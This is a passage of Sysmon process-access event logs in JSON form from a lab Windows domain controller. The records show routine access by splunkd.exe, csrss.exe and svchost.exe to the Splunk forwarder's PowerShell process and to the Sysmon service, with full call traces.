Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0281-5F25-0000-0010F5F00500}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0281-5F25-0000-0010F5F00500}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0281-5F25-0000-0010F5F00500}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
